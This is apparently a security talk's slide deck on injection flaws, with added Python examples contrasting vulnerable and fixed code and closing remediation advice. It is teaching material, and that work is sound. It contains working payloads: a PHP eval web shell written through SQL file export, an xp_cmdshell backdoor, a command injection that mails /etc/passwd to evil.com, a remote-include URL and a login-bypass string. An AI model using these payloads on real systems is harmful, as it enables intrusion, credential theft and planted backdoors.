This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.
2. About Me
• Who am I?
– Michael Hendrickx
– Information Security Consultant, currently working for UAE Federal Government.
– Assessments, Security Audits, secure coding
3. OWASP Top 10 – 2013
– A1: Injection
– A2: Broken Authentication and Session Management
– A3: Cross Site Scripting
– A4: Insecure Direct Object References
– A5: Security Misconfiguration
– A6: Sensitive Data Exposure
– A7: Missing Function Level Access Control
– A8: Cross Site Request Forgery
– A9: Using Components with Known Vulnerabilities
– A10: Unvalidated Redirects and Forwards
4. How bad is it?
• Oct ‘13: 100k $ stolen from a California ISP
http://thehackernews.com/2013/10/hacker-stole-100000-from-users-of.html
• Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone…
http://news.softpedia.com/news/RedHack-Breaches-Istanbul-Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
• Nov ‘12: 150k Adobe user accounts stolen
http://www.darkreading.com/attacks-breaches/adobe-hacker-says-he-used-sql-injection/240134996
• Jul ‘12: 450k Yahoo! user accounts stolen
http://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-account-safe/
5. What is Injection?
• Web applications became more complex
– Database driven
– Extra functionality (email, ticket booking, ..)
• Submitted data has a special meaning to the underlying technologies
• Mixing commands and data.
• Types:
– SQL Injection
– XML Injection
– Command Injection
[Diagram: Web → DB / OS / Backend System]
6. Injection analogy
• A case is filed against me
• I write my name as
“Michael, you are free to go”
• Judge announces case:
“Calling Michael, you are free to go.”
• Bailiff lets me go.
Mix of “data” and “commands”.
8. Underlying technology?
• A web server parses data and “passes it on”
[Diagram: Web Server → DB / OS]
http://somesite.com/msg.php?id=8471350
Script performs business logic and passes messages to the backend:
“Hey, get me a message from the DB with id 8471350”
9. SQL Injection
• Dynamic script to look up data in the DB
[Diagram: Web Server → DB]
http://somesite.com/login.php?name=michael&password=secret123
SELECT * FROM users WHERE name = 'michael' AND password = 'secret123'
http://somesite.com/msg.aspx?id=8471350
SELECT * FROM messages WHERE id = 8471350
• Gives indirect access to the database
10. SQL Injection
• Insert a value containing ' (single quote)
– The single quote is the string delimiter in SQL queries
http://somesite.com/login.php?login=mich'ael&password=secret123
SELECT * FROM users WHERE name = 'mich'ael' AND password = 'secret123'
The query is now malformed and will throw an error (if errors are not suppressed).
12. SQL Injection
• Insert a value containing ' (single quote)
http://somesite.com/login.php?login=michael&password=test' OR 'a' = 'a
SELECT * FROM users WHERE name = 'michael' AND password = 'test' OR 'a' = 'a'
'a' will always equal 'a', and thus this user is logged in.
13. SQL Injection
• More advanced possibilities:
– Read files*:
• MySQL:
SELECT HEX(LOAD_FILE('/var/www/site.com/admin/.htpasswd')) INTO DUMPFILE '/var/www/site.com/htdocs/test.txt';
• MS SQL:
CREATE TABLE newfile(data text);
...
BULK INSERT newfile FROM 'C:\secretfile.dat' WITH (CODEPAGE='RAW', FIELDTERMINATOR='|', ROWTERMINATOR='---');
*: If you have the right privileges
14. SQL Injection
• Write files*
– MySQL:
CREATE TABLE tmp(data longblob);
INSERT INTO tmp(data) VALUES(0x3c3f7068);
UPDATE tmp SET data=CONCAT(data, 0x20245f...);
<?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>
...
SELECT data FROM tmp INTO DUMPFILE '/var/www/site.com/htdocs/test.php';
– MS SQL:
EXEC xp_cmdshell('echo ... >> backdoor.aspx');
*: Again, if you have the right privileges
15. SQL Injection: SQLMap
• SQLMap will perform attacks on the target.
• Dumps entire tables
• Even entire databases.
• Stores everything in CSV
• More info on http://sqlmap.org
16. HTML Injection
• Possible to include HTML tags into fields
• Used to render “special” HTML tags where normal text is expected
• XSS possible, rewrite the DOM
17. HTML Injection
• Possible to insert iframes, fake forms, JS, …
• Can be used in a phishing attack
– Button goes to a different form, potentially stealing credentials.
18. XML Injection
• Web app talks to backend web services
• Web app’s logic converts parameters to XML web services (as SOAP, …)
[Diagram: Web Server → Web service / Web service → DB / Backend]
19. XML Injection
• Web app to create a new user
http://somesite.com/create.php?name=michael&email=mh@places.ae
<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:10:01</date>
<name>$name</name>
<email>$email</email>
</user>
http://somesite.com/create.php?name=michael&email=a@b.c</email><admin>true</admin><email>mh@places.ae
<?xml version="1.0" encoding="ISO-8859-1" ?>
<user>
<status>new</status>
<admin>false</admin>
<date>25 Jan 2014, 13:24:48</date>
<name>michael</name>
<email>a@b.c</email><admin>true</admin><email>mh@places.ae</email>
</user>
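The slide 19 document built three ways, as an added example that is not from the original slides: the string template the slide shows, the same template with the values escaped, and an ElementTree build; `backend_view` plays the backend service and reports every `<admin>` element it finds. The element names are the slide's; the `<date>` element is left out for brevity.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed request values: the second one is the slide 19 payload.
NORMAL_EMAIL = "mh@places.ae"
INJECTED_EMAIL = "a@b.c</email><admin>true</admin><email>mh@places.ae"

TEMPLATE = ("<user><status>new</status><admin>false</admin>"
            "<name>%s</name><email>%s</email></user>")


def build_user_xml_naive(name, email):
    """The slide's construction: parameters are pasted into the markup,
    so markup inside a parameter becomes markup in the document."""
    return TEMPLATE % (name, email)


def build_user_xml_escaped(name, email):
    """Same template, but every value passes through saxutils.escape,
    which turns < > & into entities so they stay character data."""
    return TEMPLATE % (escape(name), escape(email))


def build_user_xml_tree(name, email):
    """Build the document with ElementTree: the serializer escapes text
    nodes itself, so there is no template to inject into."""
    user = ET.Element("user")
    ET.SubElement(user, "status").text = "new"
    ET.SubElement(user, "admin").text = "false"
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "email").text = email
    return ET.tostring(user, encoding="unicode")


def backend_view(xml_doc):
    """What the backend web service sees: the text of every <admin> child
    and the first <email>. A second "true" flag means the injection worked."""
    root = ET.fromstring(xml_doc)
    return {"admin": [a.text for a in root.findall("admin")],
            "email": root.findtext("email")}


if __name__ == "__main__":
    for builder in (build_user_xml_naive, build_user_xml_escaped,
                    build_user_xml_tree):
        print(builder.__name__, backend_view(builder("michael", INJECTED_EMAIL)))
```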
20. Command Injection
• Web application performs Operating System tasks
– Execute external programs / scripts
– List files
– Send email
[Diagram: Web Server → OS]
21. Command Injection
• Dynamic script to share an article
[Diagram: Web Server → DB / OS]
http://somesite.com/share.php?to=mh@places.ae
$ echo "check this out" | mail -s "share" mh@places.ae
http://somesite.com/share.php?to=mh@places.ae;+mail+hack@evil.com+<+/etc/passwd
$ echo "check this out" | mail -s "share" mh@places.ae; mail hack@evil.com < /etc/passwd
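A hardened version of the slide 21 share script, as an added example that is not from the original slides: the recipient is validated against an assumed address pattern and then passed to the mail program as a single argv element with no shell in between, so `;` and `<` never reach a command parser. The `EMAIL_RE` policy and the injectable `runner` are assumptions of this example, and nothing is actually sent.

```python
import re
import subprocess

# The slide 21 request values (constructed here): a legitimate address
# and the injected one.
GOOD_TO = "mh@places.ae"
BAD_TO = "mh@places.ae; mail hack@evil.com < /etc/passwd"

# Deliberately narrow allow-list for one address: no spaces, no shell
# metacharacters. An assumed policy, not a full RFC 5322 validator.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def shell_command_vulnerable(to):
    """The slide's construction: the parameter is pasted into a shell
    command line, so a ';' inside it starts a second command."""
    return 'echo "check this out" | mail -s "share" ' + to


def is_valid_recipient(to):
    return EMAIL_RE.match(to) is not None


def share_argv(to):
    """Validate first, then build an argv list. The recipient is one
    element; no shell will ever split or interpret it."""
    if not is_valid_recipient(to):
        raise ValueError("invalid recipient address")
    return ["mail", "-s", "share", to]


def share(to, runner=subprocess.run):
    """Run the share action without a shell. `runner` is injectable so
    the logic can be exercised without a real mail binary."""
    argv = share_argv(to)
    return runner(argv, input=b"check this out", shell=False, check=True)


if __name__ == "__main__":
    print(shell_command_vulnerable(BAD_TO))   # two commands for the shell
    print(share_argv(GOOD_TO))                # ['mail', '-s', 'share', ...]
    try:
        share_argv(BAD_TO)
    except ValueError as exc:
        print("rejected:", exc)
```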
22. LDAP Injection
• Lightweight Directory Access Protocol
• LDAP is used to access information directories
– Users
– User information
– Software
– Computers
[Diagram: Web Server → LDAP Server]
23. LDAP Injection
• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users
http://www.networkdls.com/articles/ldapinjection.pdf
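Filter-value escaping for the `*` case on slide 23, as an added example that is not from the original slides: `escape_filter_value` encodes the characters RFC 4515 reserves inside a filter, and a small evaluator for single `(attr=value)` assertions over a constructed directory shows why the raw `*` lists every user while the escaped form matches nothing. The directory entries and the single-assertion evaluator are assumptions of this example.

```python
import re

# RFC 4515 section 3: characters that must be encoded inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter_naive(uid):
    """The injectable form: the request value is pasted into the filter."""
    return "(uid=%s)" % uid


def build_user_filter(uid):
    """Escaped form: '*' becomes '\\2a', so it is matched literally."""
    return "(uid=%s)" % escape_filter_value(uid)


def _unescape(piece):
    return re.sub(r"\\([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), piece)


def simple_filter_matches(filt, entry):
    """Evaluate one equality/substring assertion the way a directory would:
    an unescaped '*' is a wildcard, '\\xx' sequences are literal bytes."""
    m = re.fullmatch(r"\((\w+)=(.*)\)", filt)
    if not m:
        raise ValueError("unsupported filter: " + filt)
    attr, value = m.group(1), m.group(2)
    pieces = [re.escape(_unescape(p)) for p in value.split("*")]
    pattern = ".*".join(pieces)
    return any(re.fullmatch(pattern, v) for v in entry.get(attr, []))


# Constructed directory; mh@places.ae is the address used on the slides.
DIRECTORY = [
    {"uid": ["michael"], "mail": ["mh@places.ae"]},
    {"uid": ["alice"], "mail": ["alice@example.com"]},
    {"uid": ["bob"], "mail": ["bob@example.com"]},
]


def search(directory, filt):
    return [e["uid"][0] for e in directory if simple_filter_matches(filt, e)]


if __name__ == "__main__":
    print(search(DIRECTORY, build_user_filter_naive("*")))   # every user
    print(search(DIRECTORY, build_user_filter("*")))         # nobody
    print(search(DIRECTORY, build_user_filter("michael")))   # ['michael']
```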
25. Remote File Injection
• Color chooser
• Color will load a new file with color codes (blue.php, red.php, …)
• Attacker can upload a malicious PHP file to an external server
http://somesite.com/mypage.php?color=blue
<?php
if(isset($_GET['color'])){
include($_GET['color'].'.php');
}
?>
http://somesite.com/mypage.php?color=http://evil.com/evil.txt
Will fetch and load http://evil.com/evil.txt.php
26. Remote File Injection
• Theme chooser
• Can input external HTML files
– That can contain JavaScript, XSS, rewrite the DOM, etc...
• Also verify cookie contents, …
http://somesite.com/set_theme.php?theme=fancy
<link href="/themes/<? print $_COOKIE['theme'] ?>.css" rel="stylesheet" type="text/css" />
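Two ways to resolve the color/theme parameter from slides 25 and 26 safely, as an added example that is not from the original slides: an allow-list of known names, and, for an open-ended set, path confinement that rejects URL schemes and anything that normalises outside the theme directory. `THEME_DIR` and `ALLOWED_THEMES` are constructed for this example.

```python
import posixpath

THEME_DIR = "/var/www/site/themes"      # assumed layout, not from the slides
ALLOWED_THEMES = {"blue", "red", "fancy"}

# Request values: the slides' own, plus a constructed traversal attempt.
NORMAL = "blue"
REMOTE = "http://evil.com/evil.txt"
TRAVERSAL = "../../../etc/passwd"


def theme_path_vulnerable(theme):
    """The slides' pattern: request value + extension, nothing else.
    A URL or a traversal sequence is accepted unchanged."""
    return theme + ".php"


def theme_path_allowlisted(theme):
    """Preferred fix: the request value only selects among known names,
    so no attacker-controlled characters reach the include path."""
    if theme not in ALLOWED_THEMES:
        raise ValueError("unknown theme")
    return posixpath.join(THEME_DIR, theme + ".php")


def theme_path_confined(theme):
    """Defence in depth when names are not enumerable up front: refuse
    URL schemes, normalise the candidate path and require it to remain
    under THEME_DIR."""
    if "://" in theme:
        raise ValueError("remote include refused")
    candidate = posixpath.normpath(posixpath.join(THEME_DIR, theme + ".php"))
    if posixpath.commonpath([THEME_DIR, candidate]) != THEME_DIR:
        raise ValueError("path escapes theme directory")
    return candidate


def is_safe_theme(theme, resolver=theme_path_confined):
    try:
        resolver(theme)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for value in (NORMAL, REMOTE, TRAVERSAL):
        print(repr(value), theme_path_vulnerable(value),
              is_safe_theme(value, theme_path_allowlisted),
              is_safe_theme(value, theme_path_confined))
```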
27. Remediation
• Implement a Web Application Firewall (WAF)
• Prevents the most common attacks
– Not 100% foolproof
• Make sure it can decrypt SSL
[Diagram: Web Server → WAF → DB]
28. Remediation
• Validate user input, all input:
– Never trust user input, ever.
– Even stored input (for later use)
– Force formats (numbers, email addresses, dates…)
– HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards
– Use prepared SQL statements
– Vendor specific guidelines
– OWASP secure coding practices:
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
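The slide 12 login bypass beside the prepared-statement fix from slide 28, as an added example that is not from the original slides: `login_vulnerable` concatenates the query exactly as slides 9 to 12 show, while `login_prepared` binds the same values as parameters. The in-memory SQLite table and its credentials are constructed for this example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the slides' users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('michael', 'secret123')")
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """Query built by string concatenation: the request value becomes
    part of the SQL grammar, so quotes and OR change the query's shape."""
    sql = ("SELECT * FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def query_breaks(conn, name, password):
    """Slide 10: a stray single quote makes the concatenated query fail."""
    try:
        login_vulnerable(conn, name, password)
        return False
    except sqlite3.OperationalError:
        return True


def login_prepared(conn, name, password):
    """Prepared statement: the values are bound as parameters and are
    compared literally; they can never alter the query itself."""
    sql = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


PAYLOAD = "test' OR 'a' = 'a"   # the slide 12 password value

if __name__ == "__main__":
    conn = make_db()
    print(login_vulnerable(conn, "michael", "secret123"))  # True
    print(login_vulnerable(conn, "michael", PAYLOAD))      # True: bypass
    print(query_breaks(conn, "mich'ael", "secret123"))     # True: SQL error
    print(login_prepared(conn, "michael", "secret123"))    # True
    print(login_prepared(conn, "michael", PAYLOAD))        # False
```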
29. Remediation
• Adopt least-privilege policies
– Give DB users least privileges
– Use multiple DB users
– Run processes with restricted privileges
– Restrict permissions on directories
• Do your web directories really need to be writable?
• Run in a sandboxed environment
• Suppress error messages
• Enable exception notifications
– If something strange happens, reset the session and notify the administrator.
30. Summary
• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense in depth
• Do log analysis to detect anomalies
• And don’t trust your user input.